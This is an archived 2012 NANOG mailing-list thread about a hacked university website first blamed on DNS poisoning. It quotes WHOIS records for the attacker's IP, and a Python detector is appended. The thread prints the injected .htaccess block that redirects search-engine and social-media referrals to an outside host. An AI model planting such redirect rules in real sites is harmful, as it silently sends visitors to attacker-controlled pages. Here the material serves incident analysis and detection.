No DNS poisoning at Google (in case of trouble, blame the DNS)

Kyle Creyts kyle.creyts at gmail.com
Tue Jul 3 18:27:41 UTC 2012


it actually appears that skywire has a suballocation for that block,
http://www.robtex.com/ip/208.88.11.111.html#whois

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=208.88.11.111?showDetails=true&showARIN=false&ext=netref2
#

American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0 - 208.88.11.255
Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#

On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black <Matthew.Black at csulb.edu> wrote:

> By the way, FTP access originated from: 208.88.11.111
>
> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 -
> 208.88.11.255
>
> NetRange:       208.88.8.0 - 208.88.11.255
> CIDR:           208.88.8.0/22
> OriginAS:       AS40603
> NetName:        SKYWIRE-SG
> NetHandle:      NET-208-88-8-0-1
> Parent:         NET-208-0-0-0-0
> NetType:        Direct Allocation
> Comment:        http://www.skywireusa.com
> RegDate:        2008-03-04
> Updated:        2012-03-02
> Ref:            http://whois.arin.net/rest/net/NET-208-88-8-0-1
>
> OrgName:        Sky Wire Communications
> OrgId:          DGSU
> Address:        946 W Sunset Blvd Ste L
> City:           St George
> StateProv:      UT
> PostalCode:     84770
> Country:        US
> RegDate:        2007-12-04
> Updated:        2009-11-04
> Ref:            http://whois.arin.net/rest/org/DGSU
>
>
> Who We Are
> Skywire Communications is the Leading High Speed Internet Provider in
> Southern Utah. Offering Service in St George, Washington, Santa Clara,
> Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to
> provide high speed internet access to 100 Percent of Southern Utah. We are
> located in St George, Utah.
>
>
>
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> -----Original Message-----
> From: Matthew Black [mailto:Matthew.Black at csulb.edu]
> Sent: Wednesday, June 27, 2012 9:52 AM
> To: 'Jason Hellenthal'; Arturo Servin
> Cc: nanog at nanog.org
> Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)
>
> Ask and ye shall receive:
>
> # more .htaccess (backup copy)
>
> #c3284d#
> <IfModule mod_rewrite.c>
> RewriteEngine On
> RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
> </IfModule>
> #/c3284d#
>
>           # # #
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
> -----Original Message-----
> From: Jason Hellenthal [mailto:jhellenthal at dataix.net]
> Sent: Wednesday, June 27, 2012 6:26 AM
> To: Arturo Servin
> Cc: nanog at nanog.org
> Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
>
>
> What would be nice is to see the contents of the htaccess file
> (obviously with sensitive information excluded)
>
> On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
> >
> > It was not a DNS issue, but it was a clear case of how community-support
> > helped.
> >
> > Some of us may even learn some new tricks. :)
> >
> > Regards,
> > as
> >
> > Sent from mobile device. Excuse brevity and typos.
> >
> >
> > On 27 Jun 2012, at 05:07, Daniel Rohan <drohan at gmail.com> wrote:
> >
> > > On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <bortzmeyer at nic.fr> wrote:
> > >
> > >> What made you think it can be a DNS cache poisoning (a very rare
> > >> event, despite what the media say) when there are many much more
> > >> realistic possibilities (<troll>specially for a Web site written in
> > >> PHP</troll>)?
> > >>
> > >> What was the evidence pointing to a DNS problem?
> > >>
> > >
> > > It seems likely that he made a mistake in his analysis of the evidence.
> > > Something that could happen to anyone when operating outside of a
> > > comfort zone or having a bad day. Go easy.
> > >
> > > -DR
> >
>
> --
>
>  - (2^(N-1))


-- 
Kyle Creyts

Information Assurance Professional
BSidesDetroit Organizer
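
As an added example (not part of the original thread, and not code from any poster): a small Python check for the pattern in the quoted .htaccess, a RewriteRule that redirects to a foreign host and is gated by a RewriteCond on HTTP_REFERER, so it fires only for visitors arriving from a matching referrer. The function names, the `own_hosts` parameter and the sample input (a shortened, constructed form of the quoted block plus benign rules on the placeholder host example.edu) are assumptions for illustration.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a shortened form of the injected block quoted above,
# preceded by two benign rules that must not be flagged.
SAMPLE = r"""
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.edu/ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]
RewriteRule ^old/(.*)$ /new/$1 [L]
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(ask|bing|google|yahoo|yandex)\.(.*)
RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L]
</IfModule>
#/c3284d#
"""

def logical_lines(text):
    """Yield (line_no, directive); joins backslash continuations, skips comments."""
    buf, start = "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        start = start if buf else no
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf = (buf + line).strip()
        if buf and not buf.startswith("#"):
            yield start, buf
        buf = ""

def find_referer_redirects(text, own_hosts=()):
    """Flag RewriteRules that redirect to a foreign host and are gated by a
    RewriteCond on HTTP_REFERER (hypothetical helper, not an Apache API)."""
    findings, referer_cond = [], None
    for no, line in logical_lines(text):
        parts = line.split()
        name = parts[0].lower()
        if name == "rewritecond" and len(parts) >= 3 and "http_referer" in parts[1].lower():
            referer_cond = parts[2]
        elif name == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            host = urlparse(target).hostname if re.match(r"https?://", target, re.I) else None
            if referer_cond and host and host.lower() not in own_hosts:
                findings.append({"line": no, "host": host, "referer_pattern": referer_cond})
            referer_cond = None  # conditions apply only to the next RewriteRule
    return findings
```

Run over every .htaccess under a document root, passing the site's own hostnames as `own_hosts`, any finding is worth comparing against a known-good copy of the file.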


